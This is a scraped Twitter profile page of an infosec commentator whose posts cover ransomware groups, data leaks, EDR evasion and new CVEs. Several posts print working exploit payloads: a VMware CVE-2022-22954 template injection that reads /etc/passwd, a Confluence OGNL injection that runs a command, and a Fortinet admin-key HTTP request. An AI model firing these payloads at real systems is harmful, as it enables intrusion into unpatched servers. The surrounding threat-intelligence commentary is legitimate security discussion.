Soufiane
@S0ufi4n3
Followers
12,827
Following
203
Media
1,225
Statuses
5,415
A random infosec/science enthusiast guy... This account is personal and only reflects my opinions, not those of my employer..🖕
Joined August 2011
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
#IanxSB19xTerry
• 272964 Tweets
#MOONLIGHT_MVTeaser
• 136185 Tweets
Rio Grande do Sul
• 116309 Tweets
Boeing
• 101794 Tweets
Suho
• 86184 Tweets
RPWP CONCEPT PHOTO 2
• 57854 Tweets
プロフェッショナル
• 56611 Tweets
joongdunk love workpoint
• 39527 Tweets
青山先生
• 29967 Tweets
عدنان البرش
• 26208 Tweets
#無責任でええじゃないかLOVE
• 25413 Tweets
Indonesia vs Irak
• 19379 Tweets
YOUNG K
• 16054 Tweets
VACHSS
• 14783 Tweets
Seriously what the hell is going on !!
#Lapsus
is claiming attacks on
#Nvidia
then
#Nvidia
hit back with a
#Ransomware
Lapsus claims to have 1TB of data and is leaking all Nvidia employees' passwords and NTLM hashes
@Cyberknow20
@SOSIntel
@vxunderground
@ransomwaremap
47
332
1K
(CVE-2023-32530) Trend Micro Apex Central 2019 (<= Build 6016) Authenticated RCE
Well.. This is an unusual SQLi vector
9
126
555
A TA going by the handle Spyboy is selling an AV/EDR killer that is allegedly capable of killing almost every AV/EDR on the market.
26
155
520
Potentiel shitstorm ahead:
CVE-2023-51385: OpenSSH OS command injection vulnerability.
Merry Christmas!
7
134
451
I've been playing today with Citrix Secure Access windows client and to my surprise it's a webview driven app that holds it's authentication state using.. A Cookie that can be extracted from memory with no special privileges. The cookie can then be used to access the web portal.
11
110
434
New technique to bypassing EDRs with EDR-Preloading.
Tldr: blocking EDR from loading it's DLL into a process preventing the deployment of user land hooks.
5
156
429
Shit storm ahead: A threat actor is claiming to have "Dell Inc" Code Signing Certificate!
13
88
403
A Russian 0day broker is rising
@signalapp
RCE price to 2 million dollars. This 4 times the price Zerodium offers.. 🤔
11
91
399
AirAsia Group is allegedly hit by Daixin ransomware group 5M UNIQUE Passengers personal data, All employees personal data leaked
@ransomwaremap
39
415
389
POC for CVE-2022-39952 affecting Fortinet FortiNAC
Why it's so easy... :/
9
108
340
4TB of proprietary data from 🇮🇱
@Cellebrite
(Cellebrite Mobilogy & Cellebrite TFS backup) leaked by anonymous source.
Notably, Cellebrite Mobilogy shares code with Cellebrite Universal Forensics Extraction Device or Cellebrite UFED, used by law enforcement agencies.
8
144
336
Well done h4x0rz you got the attention of 90% of Twitter for two days.
The community will indeed have a field day unfollowing all of your accounts...
#KasperskyLeakFail
:)
14
80
317
I'll be releasing soon the source code of a
#ransomware
simulator with the following capabilities:
-AES encryption of a given number of files with given extensions
-FTP/SMTP exfiltratetion
-Shadow copy create/delete + some LOLbs
-Ransomenote dropping
-Logging
14
53
314
Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique
2
100
308
The
#Conti
leak contains at least one still active SSH access have a look at the content
@CoreSecurity
:)
@SOSIntel
@Cyberknow20
#Ransomeware
8
72
279
I extracted the bitcoin wallet addresses from the affected ESXi ( 315 indexed by shodan at the moment of pulling them) feel free to PR and add new ones.
22
94
271
Because we all love graphs.
Just discovered this open-source visualization application that transforms various data formats, such as JSON, YAML, XML, CSV and more, into interactive graphs.
3
65
260
Here is the code of my
#Ransomware
simulator:
I ended up replacing AES with simple XOR.
- Exfiltrating Documents (SMTP and/or FTP)
- Creating/Deleting Volume Shadow Copies
- Encrypting documents
- Dropping a ransomware note to the user's desktop
2
69
253
Some
#CobaltStrike
commands used by
#Conti
grabbed from the
#ContiLeaks
.
They once used heavily Mega to exfiltrate data.
#ThreatIntelligence
#Infosec
3
72
246
#VMware
CVE-2022-22954 PoC:
catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
4
75
220
I made a single JSON file from the iSoon/Anxun leak (that you can grab from here () The very first analysis shows that the two key figures are lengmo and Shutd0wn:
4
49
218
Quite disturbing to notice that by only "ticking" "Produce a single file" when publishing a .net core assembly, most EDRs stop detecting even very basic msfvenom reverse shells!
CS was completely blinded, S1 killed the process once co established.
7
45
207
Just installed Nmap and ran it... Mind blowing tho.. I'm getting addicted to this shit lol
OpenAI is awesome 😁😁
9
30
206
Win32k Elevation of Privilege Vulnerability - CVE 2023 29336 PoC
1
62
202
Ok, the thrill is gone:
#raidforums
was seized by the
#FBI
which means that the FBI is into phishing now lol
The NS domains were used in previous cases:
@Cyberknow20
@SOSIntel
@
8
70
185
9
51
186
Nobody will ever say this enough: insider threats exist and you are probably not prepared for that.
6
34
186
Hell's gates are officially welcoming you 😂 : Internet Control Message Protocol (ICMP) Remote Code Execution Vulnerability
a
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23415
7
38
177
Not very opsec friendly for an APT dude 😅
3
30
171
A very early version of a HaveIbeenPwnd like related to
#Ransomware
leaks and attacks
#cyberattacks
#threatintel
#breach
#data
#leak
4
49
168
#Lapsus
group claims they breached
#Samsung
#CyberAttack
#ThreatHunting
@SOSIntel
@Cyberknow20
@GossiTheDog
@campuscodi
6
55
130
5
55
156
Confluence RCE (CVE-2022-26134)
Poc:
{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/
0
45
157
Someone shared a massive data breach in
@altice_portugal
due to an SQL injection on one of their portal.
#CyberSecurity
#Data
#Breach
#Leak
#Infosec
#threat
13
86
145
Seems like "SandboxEscaper" switched to the dark side of the moon
7
19
142
A threat actor is selling what could be the most significant leak of the Shanghai GOV () National Police Database.
From the sample, it smells like a poorly protected API...
10
51
138
PoC exploit for CVE-2023-46214, SVD-2023-1104
Splunk Enterprise versions below 9.0.7 and 9.1.2 RCE
1
57
133
#Lapsus
group claims they breached
#Samsung
#CyberAttack
#ThreatHunting
@SOSIntel
@Cyberknow20
@GossiTheDog
@campuscodi
6
55
130
The FBI charged BreachForums operator Conor Brian Fitzpatrick aka Pompompurin Peekskill, NY.
2
35
123
1/2
Working on a shellcode injector that will download the SC and inject it either in a process or into the running process with capability of decrypting it (aes) if the key is provided. Managed to unhook stuff patch amsi/etw. Windows Defender is bypassed at this stage.
4
13
108
The Montenegro 🇲🇪' gov Open data portal breached via an SQLi.. Can't be more ironic..
1
23
109
The Federal government of the United States allegedly fell victim to the Endurance Ransomware.
5
35
103
Je suis effaré par l'absurdité et la cruauté de ce qui s'est passé. Je suis désolé
#MonsieurPaty
, je suis désolé
#ConflansSainteHonorine
. Je prends sincèrement part de cette douleur, de ce chagrin et de cette incompréhension. Jamais l'idée va mourir. Repose en paix Mr Paty.
2
21
98
#DistributedDenialofSecrets
launched a new public download server with over a 100 leaked dataset.
https://data[.]
ddosecrets[.] com
2
31
100
New infostealer dubbed WhiteSnake supporting Linux and Windows operating systems being advertised on pew pew pew forums
1
36
98
Notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)
1
37
102
This leak gives some insights on how the coders use Process hollowing, API unhooking, some LOLBins usage, Defender Folder exclusion...
Account (nicknames): kaktus / collin / fuzz
---
---
#trickbotleaks
#trickbot
#ransomware
#malware
#conti
#trickleaks
@briankrebs
@VK_Intel
@MalwareTechBlog
@pancak3lullz
@ValeryMarchive
@TechCrunch
@LawrenceAbrams
@Ionut_Ilascu
@troyhunt
2
15
49
1
40
100
A Working PoC for CVE-2022-41040 and CVE-2022-41082 (aka ProxyNotShell) is out
2
27
96
#Lapsus
want to make
#Nvidia
Open source lol 😂
@SOSIntel
@vxunderground
@GossiTheDog
@campuscodi
#CyberAttacks
#infosec
#leaks
7
33
94
The "cyber incident" announced by the German-based independent manufacturer of power semiconductor components SEMIKRON is a ransomware attack held by
#LV
group. 2Tb of data allegedly stolen.
@ransomwaremap
@cyber_etc
@ValeryMarchive
2
35
93
The supposedly
#Bitcoin
address used by
#Lapsus
received a total of 3,790.62159317 BTC ($160,262,780.59)... I have to admit that extortion works :)
btc wallet hint from
@HaboubiAnis
14
38
88
A threat actor seems specialized in selling GOV emails access of these countries
France 🇫🇷, India 🇮🇳, Malaysia 🇲🇾, Nigeria 🇳🇬, Pakistan 🇵🇰 and Vietnam🇻🇳
8
33
90
3) Go to russianmarket and download all your credentials and cookies.
3
8
87
Proof of concept for a bug, that allows any user to crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain.
3
25
88
I processed the image files from the ISOON/Anxun leak (using Tesseract OCR) the result is probably approximative but you can grab it here …. Now working on translating the stuff locally using facebook/mbart-large-50-many-to-many-mmt, will take some time.
1
24
88
Yet another os command injection.. Seriously Fortinet...How the fck is even possible having this amount of vulnerabilities...
2
26
86
The Microsoft security team detected a nation-state attack on our corporate systems on January 12, 2024. Microsoft has identified the threat actor as Midnight Blizzard, the Russian state-sponsored actor also known as Nobelium.
4
25
85
0
31
85
#Lockbit
DLS updated too, now they have a fucking bugbounty program 😂
@ValeryMarchive
@vxunderground
7
24
82
Looks like for about 12hours
#Rostelecom
hijacked part of the traffic destinated to
#Apple
.
Source:
2
32
80
Visual graph of doxed
#TrickBot
group members as published by
#trickbotleaks
High resolution:
PS1: Maltego file in the repo.
#ThreatIntelligence
@JGomes_EU
@SOSIntel
@modernanalytica
@sharimahmad07
5
34
77
#Lockbit
operator accuses a user named Alan Wake,(the sponsor of the new xss contest) , of being the leader of
#Conti
and the new
#BlackBasta
#ransomware
.
There are whispers about Lockbit operator being blocked in xss, and according to him, blocked, he will creates his own forum
5
28
77
Windows is leaking NTLM by design...
Today’s Theme is vulnerability 👀
Akamai researchers have discovered a vuln in Windows Themes that can trigger an authentication coercion - with almost zero user interaction.
User views the file, Explorer sends SMB packets with credentials.
Full post:
2
89
211
2
20
78
A PoC was dropped for the CVE-2023-32530, one of iOS/MacOS 0days from Operation Triangulation presented on CCC by Kaspersky falks.
0
26
76
China’s Ministry of State Security (MSS) has claimed that the NSA infiltrated servers belonging to Chinese tech company Huawei as far back as 2009.
Source :
3
30
75
@dcuthbert
@Fortinet
41 lines are way too much
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: Hostname
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 606
{
"ssh-public-key1": "key"
}
3
15
73
JNDI injection (again) -CVE-2024-20931 analysis
0
33
69
LockBit's first bounty of 50,000 dollars was paid for discovering a bug related to encryption in this ransomware
5
13
67
0
29
65
Catho ( a job search portal.) based in Barueri, Brazil. Catho Online Ltda. operates as a subsidiary of Brasil Online Holdings Coperatief U.A. And it suffered a massive data breach impacting 10.7M users.
The leak contains name, login, email, password and is being sold for $2k.
6
32
64
After successfully locking Oil India, the
#ransomware
group trying to impersonate REvil (or maybe REvil ?!) added a new victim to their blog:Visotec Group.
I'll be calling them useransom.187201 until an "official" name is given to them.
@ValeryMarchive
@SOSIntel
@ransomwaremap
5
19
65
Ransomware Diaries: Volume 3 – LockBit’s Secrets.
This dude
@Jon__Dimaggio
does an impressive job.
Thank you!
1
21
61
The leader of the APT28 group pwned :
3
19
62
Here we are.. CVE-2023-34362: MOVEit Transfer Unauthenticated RCE PoC
2
33
61
Holly Sh**
#KARAKURT
the extortion group linked to
#Conti
added a whole bunch of victims to their new blog!
@ValeryMarchive
@SOSIntel
@ransomwaremap
@cyber_etc
4
24
60
Panasonic Canada was hit by
#Conti
#Ransomware
group, and part of the data started to leak.
@SOSIntel
@Cyberknow20
@ValeryMarchive
@ransomwaremap
2
35
61